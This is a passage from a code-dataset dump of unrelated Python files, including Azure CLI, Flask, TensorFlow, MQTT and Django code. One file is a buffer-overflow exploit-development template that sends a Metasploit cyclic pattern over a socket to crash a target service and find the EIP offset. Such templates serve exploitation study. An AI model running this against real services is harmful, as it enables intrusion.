print(countSmaller([5,2,6,1, 0]))\n\n\n\n","sub_path":"src/main/num301_400/315_计算右侧小于当前元素的个数.py","file_name":"315_计算右侧小于当前元素的个数.py","file_ext":"py","file_size_in_byte":958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"135022168","text":"# --------------------------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. See License.txt in the project root for license information.\n# --------------------------------------------------------------------------------------------\n\nfrom azure.cli.core.util import sdk_no_wait\n\nfrom knack.log import get_logger\n\nlogger = get_logger(__name__)\n\n\ndef network_client_factory(cli_ctx, **kwargs):\n from azure.cli.core.profiles import ResourceType\n from azure.cli.core.commands.client_factory import get_mgmt_service_client\n return get_mgmt_service_client(cli_ctx, ResourceType.MGMT_NETWORK, **kwargs)\n\n\ndef create_nat_gateway(cmd, nat_gateway_name, resource_group_name,\n location=None, public_ip_addresses=None,\n public_ip_prefixes=None, idle_timeout=None, zone=None, no_wait=False):\n\n client = network_client_factory(cmd.cli_ctx).nat_gateways\n NatGateway, NatGatewaySku = cmd.get_models('NatGateway', 'NatGatewaySku')\n\n nat_gateway = NatGateway(name=nat_gateway_name,\n location=location,\n sku=NatGatewaySku(name='Standard'),\n idle_timeout_in_minutes=idle_timeout,\n zones=zone,\n public_ip_addresses=public_ip_addresses,\n public_ip_prefixes=public_ip_prefixes)\n\n return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, nat_gateway_name, nat_gateway)\n\n\ndef update_nat_gateway(instance, cmd, public_ip_addresses=None,\n public_ip_prefixes=None, idle_timeout=None):\n\n with cmd.update_context(instance) as c:\n c.set_param('idle_timeout_in_minutes', idle_timeout)\n if public_ip_addresses is not None:\n c.set_param('public_ip_addresses', public_ip_addresses)\n if public_ip_prefixes is not None:\n c.set_param('public_ip_prefixes', public_ip_prefixes)\n return instance\n\n\ndef list_nat_gateway(cmd, resource_group_name=None):\n client = network_client_factory(cmd.cli_ctx).nat_gateways\n if resource_group_name:\n return client.list(resource_group_name)\n return client.list_all()\n","sub_path":"src/azure-cli/azure/cli/command_modules/natgateway/custom.py","file_name":"custom.py","file_ext":"py","file_size_in_byte":2316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"621988801","text":"#!/usr/bin/env python3\nimport socket, time, sys\n\n# NOTE: This template used https://www.exploit-db.com/exploits/1582 as the example\n# IMPORTANT: Dont forget to set up l_bytes\n\n# Phase 2: Find the offset of EIP at the time of the crash\n\n# ------------------------------------------------------------------\n# How do we find the offset?\n# ------------------------------------------------------------------\n# Use pattern_create to create pattern to inject\n# /usr/bin/msf-pattern_create -l \n# Crash the service with this payload and note value of EIP\n# Use pattern_offset to find offset of EIP from beginning of injection\n# /usr/bin/msf-pattern_offset -q \n#\n# Example:\n# /usr/bin/msf-pattern_create -l 4379 > /tmp/pattern\n# python3 2-find-eip-offset.py 192.168.56.32 13327 /tmp/pattern\n\nif len(sys.argv) != 4:\n print()\n print(\"Usage: {} \".format(sys.argv[0]))\n print(\"\\ttarget ip: Remote hostname or IP address of target service\")\n print(\"\\ttarget port: Remote port of target sevice\")\n print(\"\\tpattern file location: Location of file created with msf-pattern_create\")\n exit(0)\n\n# sys.argv is the list of command line arguments\nRHOST = 1\nRPORT = 2\nPATTERN_FILE_LOCATION = 3\n\nl_rhost: str = sys.argv[RHOST]\nl_rport: int = int(sys.argv[RPORT])\nl_pattern_file_location: str = sys.argv[PATTERN_FILE_LOCATION]\n\nwith open(l_pattern_file_location, 'r') as l_file:\n l_pattern = l_file.read().replace('\\n', '')\n\ntry:\n # Create a TCP (socket)\n print(\"Connecting to {} port {}\".format(l_rhost, l_rport))\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.connect((l_rhost, l_rport))\n print(\"Connected\")\nexcept:\n print(\"Could not connect to {} port {}\".format(l_rhost, l_rport))\n exit(0)\n\ntry:\n # Send the message via the socket using the specific protocol\n print(\"Sending payload of length {}\".format(len(l_pattern)))\n # Example:\n # l_bytes = b'\\x11' + '(setup sound '.encode() + l_pattern.encode() + b'\\x90\\x00' + '#'.encode()\n l_bytes = ''\n s.send(l_bytes)\n data = s.recv(1024)\n print(\"Data received: {}\".format(data))\nexcept:\n print(\"Could not send payload\")\n\ntime.sleep(1)\ns.close()\n","sub_path":"buffer-overflow/template/2-find-eip-offset-template.py","file_name":"2-find-eip-offset-template.py","file_ext":"py","file_size_in_byte":2349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"378229045","text":"from db import db\n\n\nclass ComicModel(db.Model):\n __tablename__ = 'comic'\n\n id = db.Column(db.Integer, primary_key=True)\n id_user = db.Column(db.Integer, db.ForeignKey('users.id'))\n id_comic = db.Column(db.Integer)\n name = db.Column(db.String(80))\n\n def __init__(self, id_user, id_comic, name):\n self.id_user = id_user\n self.id_comic = id_comic\n self.name = name\n\n @classmethod\n def find_by_id(cls, id_user, id_comic):\n return cls.query.filter_by(id_user=id_user, id_comic=id_comic).first()\n\n @classmethod\n def find_user_comics(cls, id_user, name=None):\n if name == None:\n result = cls.query.filter_by(id_user=id_user).all()\n else:\n result = cls.query.filter_by(id_user=id_user).filter(\n cls.name.like(f\"{name}%\")).all()\n return [value.id_comic for value in result]\n\n @classmethod\n def find_user_comics_by_ids(cls, id_user, ids_comic_list):\n result = cls.query.filter(cls.id_comic.in_(\n ids_comic_list)).filter_by(id_user=id_user).all()\n return [value.id_comic for value in result]\n\n def save_to_database(self):\n db.session.add(self)\n db.session.commit()\n\n def delete_from_database(self):\n db.session.delete(self)\n db.session.commit()\n","sub_path":"code/models/comic.py","file_name":"comic.py","file_ext":"py","file_size_in_byte":1315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"630585714","text":"import tensorflow as tf\nimport numpy as np\nimport pandas as pd\n\n\ndef normalize(inputs):\n \"\"\"\n Normalize an input array (feature scaling)\n\n Parameters\n ----------\n inputs : an input array\n\n Returns\n -------\n scaled_inputs : an input array in unit scale.\n \"\"\"\n\n mean = np.mean(inputs)\n max_element = np.max(inputs)\n min_element = np.min(inputs)\n\n scaled_inputs = np.copy(inputs)\n\n for index in range(len(inputs)):\n scaled_inputs[index] = (inputs[index] - mean) / (max_element - min_element)\n\n return scaled_inputs\n\n\n'''\nStep 1: Read data from CSV file using Pandas\n'''\ndata_from_CSV = pd.read_csv(\"data/boston.csv\")\n\nfeature_CRIM = data_from_CSV['CRIM']\nfeature_ZN = data_from_CSV['ZN']\nfeature_INDUS = data_from_CSV['INDUS']\nfeature_CHAS = data_from_CSV['CHAS']\nfeature_NOX = data_from_CSV['NOX']\nfeature_RM = data_from_CSV['RM']\nfeature_AGE = data_from_CSV['AGE']\nfeature_DIS = data_from_CSV['DIS']\nfeature_RAD = data_from_CSV['RAD']\nfeature_TAX = data_from_CSV['TAX']\nfeature_PTRATIO = data_from_CSV['PTRATIO']\nfeature_LSTAT = data_from_CSV['LSTAT']\n\ntarget_MEDV = data_from_CSV['MEDV']\n\n'''\nStep 2: Rescale the training dataset; then, construct the features and target matrix\n'''\nscaled_feature_CRIM = np.matrix(normalize(feature_CRIM)).T\nscaled_feature_ZN = np.matrix(normalize(feature_ZN)).T\nscaled_feature_INDUS = np.matrix(normalize(feature_INDUS)).T\nscaled_feature_CHAS = np.matrix(normalize(feature_CHAS)).T\nscaled_feature_NOX = np.matrix(normalize(feature_NOX)).T\nscaled_feature_RM = np.matrix(normalize(feature_RM)).T\nscaled_feature_AGE = np.matrix(normalize(feature_AGE)).T\nscaled_feature_DIS = np.matrix(normalize(feature_DIS)).T\nscaled_feature_RAD = np.matrix(normalize(feature_RAD)).T\nscaled_feature_TAX = np.matrix(normalize(feature_TAX)).T\nscaled_feature_PTRATIO = np.matrix(normalize(feature_PTRATIO)).T\nscaled_feature_LSTAT = np.matrix(normalize(feature_LSTAT)).T\n\nfeatures_matrix = np.concatenate((scaled_feature_CRIM, scaled_feature_ZN, scaled_feature_INDUS, scaled_feature_CHAS,\n scaled_feature_NOX, scaled_feature_RM, scaled_feature_AGE, scaled_feature_DIS, scaled_feature_RAD,\n scaled_feature_TAX, scaled_feature_PTRATIO, scaled_feature_LSTAT), axis=1)\n\ntarget_matrix = np.matrix(target_MEDV).T\n\n'''\nStep 3: Create placeholders for features Xs and target Y\n'''\n\n# When the summation of (theta_i)(x_i) is huge, we can utilize the\n# matrix multiplication. In order to do this, we declare placeholders as 2-D matrices.\n# In the following, [None, 12] means any number of rows and 12 columns.\nX = tf.placeholder(tf.float32, [None, 12], name='X')\nY = tf.placeholder(tf.float32, [None, 1], name='Y')\n\n'''\nStep 4: Create thetas, initialized them to 0\n'''\nthetas = tf.Variable(tf.zeros([12, 1]), name='Thetas')\ntheta0 = tf.Variable(tf.zeros([1]), name='Theta0')\n\n'''\nStep 5: Define a hypothesis function to predict Y\n'''\n\n# We can tell TensorBoard to group a certain set of nodes together.\n# In order to this, we use \"with tf.name_scope(....) as scope\".\n# Try to run TensorBoard and see what happens on the graph tab.\nwith tf.name_scope('Hypothesis_Function') as scope:\n # Recall that (Theta_i)(X_i) = (theta_1)(x_1) + ... + (theta_i)(x_i) + ... + (theta_n)(x_n)\n # Noted that I use capital letters to denote matrices.\n feature_theta_multiplication = tf.matmul(X, thetas)\n hypothesis_function = feature_theta_multiplication + theta0\n\n'''\nStep 6: Use the square error as the cost function\n'''\ncost_function = tf.multiply(tf.divide(1, 2), tf.reduce_mean(tf.pow(Y - hypothesis_function, 2)))\ntf.summary.scalar('total cost', cost_function)\n\n'''\nStep 7: Using gradient descent with learning rate of 0.3 to minimize cost\n'''\noptimizer = tf.train.GradientDescentOptimizer(learning_rate=0.3).minimize(cost_function)\n\nwith tf.Session() as session:\n '''\n Step 8: Initialize the necessary variables\n '''\n session.run(tf.global_variables_initializer())\n\n merged = tf.summary.merge_all()\n writer = tf.summary.FileWriter('./graphs/multivariate_linear_regression_feature_scaling', session.graph)\n\n '''\n Step 9: Train the model for 1,000 epochs\n '''\n for i in range(1000):\n summary, _, cost = session.run([merged, optimizer, cost_function],\n feed_dict={X: features_matrix, Y: target_matrix})\n\n writer.add_summary(summary, i)\n\n print(\"Epoch: {0}, cost = {1}\".format(i+1, cost))\n\n '''\n Step 10: Prints the training cost and all thetas\n '''\n print(\"Optimization Finished!\", '\\n')\n print(\"Training cost = {}\".format(cost))\n print(\"theta0 = {}\".format(session.run(theta0)[0]))\n print(\"theta_CRIM = {}\".format(session.run(thetas)[0][0]))\n print(\"theta_ZN = {}\".format(session.run(thetas)[1][0]))\n print(\"theta_INDUS = {}\".format(session.run(thetas)[2][0]))\n print(\"theta_CHAS = {}\".format(session.run(thetas)[3][0]))\n print(\"theta_NOX = {}\".format(session.run(thetas)[4][0]))\n print(\"theta_RM = {}\".format(session.run(thetas)[5][0]))\n print(\"theta_AGE = {}\".format(session.run(thetas)[6][0]))\n print(\"theta_DIS = {}\".format(session.run(thetas)[7][0]))\n print(\"theta_RAD = {}\".format(session.run(thetas)[8][0]))\n print(\"theta_TAX = {}\".format(session.run(thetas)[9][0]))\n print(\"theta_PTRATIO = {}\".format(session.run(thetas)[10][0]))\n print(\"theta_LSTAT = {}\".format(session.run(thetas)[11][0]))\n\n# Close the writer when you finished using it\nwriter.close()\n\n\n","sub_path":"Week 3/Assignment Guide/assignment2-problem3-solution2.py","file_name":"assignment2-problem3-solution2.py","file_ext":"py","file_size_in_byte":5513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"301214893","text":"# -*- coding: utf-8 -*- ?\nimport sqlite3\nimport cgi\n\n# подключаемся к БД\ncon = sqlite3.connect(\"news.db\")\nwith con:\n cursor = con.cursor()\n # создаем таблицу если она не создана\n cursor.execute(\"CREATE TABLE IF NOT EXISTS devices(id INT, temperature INT, door INT);\")\n\n # получаем все данные из запроса\n form = cgi.FieldStorage()\n device_id = int(form.getfirst(\"id\", \"0\"))\n temperature = int(form.getfirst(\"temperature\", \"0\"))\n door = form.getfirst(\"door\", \"0\")\n\n # ищем устройство в БД\n cursor.execute(\"SELECT * FROM devices WHERE id = %s\" % device_id)\n device = cursor.fetchall()\n\n # проверяем сущестувет ли устройство\n if not device:\n # заносим устройство в БД (т.к. Оно впервые подключилось к сети)\n cursor.execute(\"INSERT INTO devices VALUES(?,?,?)\",(device_id,temperature,door))\n else:\n # изменяем данные на новые\n cursor.execute(\"UPDATE devices SET door = ? WHERE id = ?\",(door, device_id))\n","sub_path":"server/cgi-bin/handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":1229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"81239708","text":"from programr.utils.logging.ylogger import YLogger\n\nfrom programr.parser.template.nodes.base import TemplateNode\nfrom programr.services.service import ServiceFactory\nfrom programr.parser.exceptions import ParserException\nfrom programr.utils.text.text import TextUtils\n\nclass TemplateSRAIXNode(TemplateNode):\n\n def __init__(self):\n TemplateNode.__init__(self)\n self._service = None\n\n @property\n def service(self):\n return self._service\n\n @service.setter\n def service(self, service):\n self._service = service\n\n def resolve_to_string(self, client_context):\n resolved = self.resolve_children_to_string(client_context)\n YLogger.debug(client_context, \"[%s] resolved to [%s]\", self.to_string(), resolved)\n\n if self._service is not None:\n bot_service = ServiceFactory.get_service(self._service)\n response = bot_service.ask_question(client_context, resolved)\n YLogger.debug(client_context, \"SRAIX service [%s] return [%s]\", self._service, response)\n return response\n else:\n YLogger.error(client_context, \"Sorry SRAIX does not currently have an implementation for [%s]\", self._service)\n return \"\"\n\n def resolve(self, client_context):\n try:\n return self.resolve_to_string(client_context)\n except Exception as excep:\n YLogger.exception(client_context, \"Failed to resolve\", excep)\n return \"\"\n\n def to_string(self):\n if self._service is not None:\n return \"SRAIX (service=%s)\" % (self._service)\n return \"SRAIX ()\"\n\n def to_xml(self, client_context):\n xml = 'TEMPLATE_EXPRESSION
    | TEMPLATE_EXPRESSION |\n # TEMPLATE_EXPRESSION | TEMPLATE_EXPRESSION | TEMPLATE_EXPRESSION\n # SRAIX_EXPRESSION ::== TEMPLATE_EXPRESSION |\n\n def parse_expression(self, graph, expression):\n\n if 'host' in expression.attrib:\n YLogger.warning(self, \"'host' attrib not supported in sraix, moved to config, see documentation\")\n if 'botid' in expression.attrib:\n YLogger.warning(self, \"'botid' attrib not supported in sraix, moved to config, see documentation\")\n if 'hint' in expression.attrib:\n YLogger.warning(self, \"'hint' attrib not supported in sraix, moved to config, see documentation\")\n if 'apikey' in expression.attrib:\n YLogger.warning(self, \"'apikey' attrib not supported in sraix, moved to config, see documentation\")\n\n if 'service' in expression.attrib:\n self.service = expression.attrib['service']\n\n head_text = self.get_text_from_element(expression)\n self.parse_text(graph, head_text)\n\n for child in expression:\n tag_name = TextUtils.tag_from_text(child.tag)\n\n if tag_name == 'host':\n YLogger.warning(self, \"'host' element not supported in sraix, moved to config, see documentation\")\n elif tag_name == 'botid':\n YLogger.warning(self, \"'botid' element not supported in sraix, moved to config, see documentation\")\n elif tag_name == 'hint':\n YLogger.warning(self, \"'hint' element not supported in sraix, moved to config, see documentation\")\n elif tag_name == 'apikey':\n YLogger.warning(self, \"'apikey' element not supported in sraix, moved to config, see documentation\")\n elif tag_name == 'service':\n self.service = self.get_text_from_element(child)\n else:\n graph.parse_tag_expression(child, self)\n\n tail_text = self.get_tail_from_element(child)\n self.parse_text(graph, tail_text)\n\n if self.service is None:\n raise ParserException(\"SRAIX node, service attribute missing !\")\n","sub_path":"src/programr/parser/template/nodes/sraix.py","file_name":"sraix.py","file_ext":"py","file_size_in_byte":4371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"493673234","text":"'''解析conf配置文件'''\nimport configparser\nimport os\nfrom ccxgbm.model_function import load_data, model_data, model_cv, save_data, get_bstpram, model_train, save_bstmodel, \\\n get_importance_var, model_predict, plot_ks_line, plot_roc_line, get_modelpredict_re, write_path, rmemptydir\nimport pandas as pd\n\n\ndef extract_conf(conf_path, conf_section):\n conf = configparser.ConfigParser()\n conf.read(conf_path)\n kvs = conf.items(conf_section)\n\n param = {}\n for (m, n) in kvs:\n n_v = n.split(',')\n new_n_v = []\n for j in n_v:\n try:\n try:\n new_n_v.append(int(j))\n except:\n new_n_v.append(float(j))\n except:\n new_n_v.append(j)\n param[m] = new_n_v\n return param\n\n\ndef ccxgbm_main(train_path, test_path, index_name, target_name):\n # 1.读取数据\n train = load_data(train_path) # .select_dtypes(exclude=['object'])\n test = load_data(test_path) # .select_dtypes(exclude=['object'])\n\n object_var = list(train.select_dtypes(include=['object']).columns.values)\n warn_col = [x for x in object_var if x not in [index_name]]\n if warn_col:\n print('数据中列名为%s的列,不是数值型数据,请转换为数值型数据或删除后再输入.' % warn_col)\n\n del_col = [index_name, target_name] + warn_col\n x_colnames = [x for x in train.columns if x not in del_col]\n y_colnames = target_name\n\n # 2.转换数据格式为模型要求格式\n dtrain = model_data(train, x_colnames, y_colnames)\n dtest = model_data(test, x_colnames, y_colnames)\n\n # 解析配置文件,获取网格搜索的调参列表\n conf_path = os.path.split(os.path.realpath(__file__))[0] + '/ccxgbm.conf'\n # print('###########', conf_path)\n param_grid = extract_conf(conf_path, 'GBM_PARAMS')\n print('网格参数集:%s' % param_grid)\n\n # 用config对象读取配置文件,获取到交叉验证的option参数\n conf = configparser.ConfigParser()\n conf.read(conf_path)\n num_boost_rounds = conf.getint(\"GBM_OPTIONS\", \"num_round\")\n # nthread = conf.getint(\"XGB_OPTIONS\", \"nthread\")\n cv = conf.getint(\"GBM_OPTIONS\", \"cv\")\n cv_mess = conf.get(\"GBM_OPTIONS\", \"cv_mess\")\n\n # 网格搜索\n re = model_cv(train, x_colnames, y_colnames, param_grid, num_boost_rounds, nfold=cv, message=cv_mess)\n file_name = cv_mess + '_' + str(cv) + 'FlodCV.csv'\n cv_result_path = save_data(pd.DataFrame(re.cv_results_), file_name, index=True)\n\n param = get_bstpram(re)\n param = dict(param, **{'boosting_type': 'gbdt',\n 'objective': 'binary',\n 'metric': 'auc'})\n print('最优参数为%s' % param)\n bst = model_train(dtrain, dtest, param, num_boost_rounds)\n model_path = save_bstmodel(bst, cv_mess)\n # bst.dump_model('bst_model.txt')\n\n # 重要变量\n imp_var = get_importance_var(bst)\n # plot_imp(bst)\n imp_path = save_data(imp_var, 'importance_var.csv')\n\n # 模型预测与模型评估\n train_pred_y, test_pred_y = model_predict(bst, train, test, x_colnames, y_colnames, message=cv_mess)\n # 模型预测结果\n pred_path = save_data(get_modelpredict_re(test[index_name], test_pred_y), 'test_predict.csv')\n # 画图\n trks_path = plot_ks_line(dtrain.get_label(), train_pred_y, title=cv_mess + '_train_ks-line')\n trauc_path = plot_roc_line(dtrain.get_label(), train_pred_y, title=cv_mess + '_train_ROC-line')\n # 注意,现在仅支持测试集有目标变量的,没有的情况需要后期优化时注意\n teks_path = plot_ks_line(dtest.get_label(), test_pred_y, title=cv_mess + '_test_ks-line')\n teauc_path = plot_roc_line(dtest.get_label(), test_pred_y, title=cv_mess + '_test_ROC-line')\n\n path_list = [cv_result_path, model_path, imp_path, pred_path, trks_path, trauc_path, teks_path, teauc_path]\n file = r'C:\\Users\\liyin\\Desktop\\20170620_tn\\0620_base\\model\\modelpath.txt'\n write_path(file, path_list)\n # print(path_list)\n\n rmemptydir(conf.get(\"DIRECTORY\", \"project_pt\"))\n\n\nif __name__ == '__main__':\n train_path = r'C:\\Users\\liyin\\Desktop\\20170620_tn\\0620_base\\train_base14.csv'\n test_path = r'C:\\Users\\liyin\\Desktop\\20170620_tn\\0620_base\\test_base14.csv'\n index_name = 'contract_id'\n target_name = 'target'\n\n ccxgbm_main(train_path, test_path, index_name, target_name)\n","sub_path":"ccxgbm/ccxgbm_main.py","file_name":"ccxgbm_main.py","file_ext":"py","file_size_in_byte":4404,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"141126723","text":"import json\n\ncontrib_threshold = 1\ninteract_threshold = 1\n\nnum_repos = None\nnum_users = None\n\ndef get_next_date(month, day):\n month_days = [None, 31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]\n day += 1\n if day > month_days[month]:\n month += 1\n day = 1\n return month, day\n\ndef dump_edges(nodes, file_name):\n print(\"Generating {0}\".format(file_name))\n with open(file_name, 'w') as f:\n for i in range(num_repos):\n for j in range(i+1, num_repos):\n common_contribs = len(nodes[i]['contrib'].intersection(nodes[j]['contrib']))\n common_interacts = len(nodes[i]['interact'].intersection(nodes[j]['interact']))\n if common_contribs >= contrib_threshold and common_interacts >= interact_threshold:\n f.write(\"{0},{1},{2},{3}\\n\".format(i, j, common_contribs, common_interacts))\n\nrepos = []\nwith open('repo_list.txt') as f:\n repos = [line.rstrip() for line in f.readlines()]\nnum_repos = len(repos)\nrepo_map = {repos[i]: i for i in range(num_repos)}\n\nusers = []\nwith open('user_list.txt') as f:\n users = [line.rstrip() for line in f.readlines()]\nnum_users = len(users)\nuser_map = {users[i]: i for i in range(num_users)}\n\nnodes = []\nfor i in range(num_repos):\n nodes.append({'contrib': set(), 'interact': set()})\n\nmonth = 1\nday = 1\nwhile month < 13:\n if day == 1:\n print(\"Reading data for month {0}\".format(month))\n with open(\"data/{0:02}{1:02}-all.json\".format(month, day)) as f:\n for line in f:\n e = json.loads(line.rstrip())\n if e['actor'] not in user_map:\n continue\n user = user_map[e['actor']]\n repo = repo_map[e['repo']]\n nodes[repo]['interact'].add(user)\n if e['type'] == 'PullRequestEvent' or e['type'] == 'PushEvent':\n nodes[repo]['contrib'].add(user)\n if month == 6 and day == 30:\n dump_edges(nodes, \"snapshot-0630.txt\")\n elif month == 12 and day == 31:\n dump_edges(nodes, \"snapshot-1231.txt\")\n month, day = get_next_date(month, day)\n","sub_path":"build_snapshots.py","file_name":"build_snapshots.py","file_ext":"py","file_size_in_byte":2092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"577359149","text":"from requests_html import HTMLSession,HTMLResponse\nimport urllib.request\n\nsession = HTMLSession()\nresponse = session.get(\"http://books.toscrape.com/\")\n#print(response) #STATUS CODE OK(200)\n\nsource = response.html\n#print(type(source))\n#print(source)\n#print(source.text)\n#print(source.html)\n\n\n# title=source.find('', first=True)\n#print(title[0].text)\n\nblock = source.find('ol.row', first=True) #TAG 'OL' CLASS 'ROW'\n#print(block) #ELEMENT\n#print(block.text) #ALL BLOCk\n\n#title = block.find('li h3 a', first=True)\n#print(title.text) #THE SHORT TITLE\n#print(title.attrs['title']) #ATTRIBUTE OF TITLE IS 'title'\n#print(title.attrs['href']) #LINK FOR THE TITLE\n\n\ntitles = block.find('li h3 a') #FOR ALL \n#for title in titles:\n# print(title.attrs['title'])\n #print(title.attrs['href']) \n\n#price = block.find('li p.price_color', first=True) #FOR FIRST\n#print(price.text) #WITH EURO SIGN\n#print(price.text[1:]) #WITHOUT EURO SIGN\n\nprices = block.find('li p.price_color') #FOR ALL\n# for price in prices:\n# print(price.text) #WITH EURO SIGN\n #print(price.text[1:]) #WITHOUT EURO SIGN\n\n #FOR APPENDING AND PRINTING\nname = []\ncost = []\nfor title in titles:\n name.append(title.attrs['title'])\nfor price in prices:\n cost.append(price.text)\n\n# for i in range(len(name)):\n# print(name[i])\n# print(cost[i])\n\n#image = block.find('li div.image_container img', first=True)\n#print('http://books.toscrape.com/'+image.attrs['src'])\n\nimages = block.find('li div.image_container img')\n\nlink = []\n\nfor image in images:\n link.append('http://books.toscrape.com/'+image.attrs['src'])\n\n\n\n\n# divs = source.find('div.row', first=True)\n# print(divs)\n\n# for i in range(len(name)):\n# print(name[i])\n# print(cost[i])\n# print(link[i])\n# urllib.request.urlretrieve(link[i], name[i])\n# print('\\n')\n\nurl=[\"http://books.toscrape.com/catalogue/page-2.html\"]\nfor no in range(1,51):\n url.append(f\"http://books.toscrape.com/catalogue/page-{no}.html\")\n print(url)\n","sub_path":"scrape2.py","file_name":"scrape2.py","file_ext":"py","file_size_in_byte":1979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"223460104","text":"import paho.mqtt.client as mqtt\nimport pyaes\nimport hashlib\nimport time\nimport configparser\nfrom time import sleep\n\n# import psutil\n\nconfig = configparser.RawConfigParser()\nconfig.read('config/config-subscriber.txt')\nusername = config.get('credential', 'username')\npassword = config.get('credential', 'password')\ntopic = config.get('credential', 'topic')\nserver = config.get('host', 'server')\nport = config.getint('host', 'port')\nkeepalive = config.getint('host', 'keep-alive')\nsecretkey = config.get('key', 'key')\nclientid = config.get('credential', 'client')\n#server = \"192.168.1.158\"\n\n\ndef on_connect(client, userdata, flags, rc):\n print(\"Connected with Code :\" + str(rc))\n client.subscribe(topic)\n\n\nkey = secretkey\nkey = key.encode('utf-8')\ncounter = pyaes.Counter(initial_value=0)\naes = pyaes.AESModeOfOperationCTR(key, counter=counter)\n\n\n\ndef on_message(client, userdata, msg):\n client = mqtt.Client()\n\n #start process exec\n start = time.clock()\n\n msg = msg.payload\n\n #start decrypption time\n startDS = time.clock()\n\n decrypted = aes.decrypt(msg).decode('utf-8')\n\n n = 96\n parts = [decrypted[i:i + n] for i in range(0, len(decrypted), n)]\n hashValue = ''.join(parts[0])\n pesanAsli = ''.join(parts[1])\n print(\"\")\n\n m = hashlib.sha384()\n m.update(pesanAsli.encode('utf-8'))\n digest = m.hexdigest()\n\n if hashValue == digest:\n mout.append(pesanAsli)\n\n sleep(0.1)\n\n #end decryption time\n endDS = time.clock()\n\n #end process exec\n end = time.clock()\n\n #variable temp\n btos = end-start\n btosdec = endDS-startDS\n\n #open file\n f = open('ptob.txt').readline()\n fd = open('ptob-ds.txt').readline()\n timeexec = btos+float(f)\n timedec = btosdec+float(fd)\n\n #write file\n f = open('delivery.txt', 'a')\n f.write(str(timeexec)+\"\\n\")\n f = open('outds.txt', 'a')\n f.write(str(timedec)+\"\\n\")\n\n\nclient = mqtt.Client(clientid)\nclient.username_pw_set(username, password)\nclient.connect(server, port, keepalive)\n\nclient.on_connect = on_connect\n\nclient.on_message = on_message\nmout = []\nclient.loop_start()\nwhile True:\n sleep(0.1)\n if len(mout) > 0:\n counter = pyaes.Counter(initial_value=0)\n aes = pyaes.AESModeOfOperationCTR(key, counter=counter)\n print(mout.pop())\nclient.loop_stop()","sub_path":"testing/SHA-384/subscribe.py","file_name":"subscribe.py","file_ext":"py","file_size_in_byte":2309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"612111954","text":"from django.http import JsonResponse\nfrom django.views.generic import ListView\nfrom testwork.pictures.models import Picture\n\n\nclass PicturesUrlsListView(ListView):\n\n model = Picture\n def get_queryset(self):\n \"\"\"Set filtering condition as tag property equals\n request's tag parameter with \"starting\" by default\n :return QuerySet:\n \"\"\"\n return super(ListView, self).get_queryset().filter(\n tag=self.request.GET.get('tag', 'starting')\n )\n\n def get(self, request, *args, **kwargs):\n \"\"\"Create and return Response object with json content contains list\n of pictures images urls.\n :param request:\n :param args:\n :param kwargs:\n :return JsonResponse:\n \"\"\"\n return JsonResponse(\n data=[p.imagefile.url\n for p in self.get_queryset().only('imagefile')],\n safe=False\n )\n","sub_path":"testwork/pictures/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":923,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"219025818","text":"from django.conf.urls import patterns, include, url\nfrom django.conf import settings\nfrom .views import BaseView, createuser\n\n# Uncomment the next two lines to enable the admin:\nfrom django.contrib import admin\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n # Examples:\n # url(r'^$', 'webservices.views.home', name='home'),\n # url(r'^webservices/', include('webservices.foo.urls')),\n\n # Uncomment the admin/doc line below to enable admin documentation:\n # url(r'^admin/doc/', include('django.contrib.admindocs.urls')),\n\n # Uncomment the next line to enable the admin:\n url(r'^ckeditor/', include('ckeditor.urls')),\n url(r'^admin/', include(admin.site.urls)),\n url(r'^portfolio/', include('portfolio.urls')),\n url(r'^testimonial/', include('testimonial.urls')),\n url(r'^services/', include('services.urls')),\n url(r'^contacts/', include('contacts.urls')),\n url(r'^createadmin/$', createuser),\n url(r'^$', BaseView.as_view(), name=\"root\"),\n \n \n \n url(r'^media/(?P.*)$', 'django.views.static.serve', {\n 'document_root': settings.MEDIA_ROOT,\n }),\n url(r'^static/(?P.*)$', 'django.views.static.serve', {\n 'document_root': settings.STATIC_ROOT,\n }), \n)\n","sub_path":"webservices/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"40300730","text":"import json\nfrom projectile import PROJECTILES, Projectile\nimport pyglet\nfrom pyglet import gl\nfrom pyglet.window import key\nfrom player import Player\nfrom levelgen import LevelGenerator\nfrom client import start_client\nfrom pymunk import Vec2d\n\npyglet.options['audio'] = ('alsa', 'openal', 'directsound', 'silent')\nimport pyglet.media\nimport asyncio\nimport sys\nimport random\n\nNAME = \"\"\nif len(sys.argv) > 1:\n NAME = sys.argv[1]\nelse:\n print(\"No name supplied in arguments, generating one\")\n NAME = \"\".join(str(chr(random.randint(97, 122))) for i in range(0, random.randint(3, 12)))\nprint(NAME)\n\nwindow = pyglet.window.Window()\nmap_batch = pyglet.graphics.Batch()\nmap_sprites = LevelGenerator.generate_level(map_batch)\nADDR = ('127.0.0.1', 8888)\n\ncharacter_batch = 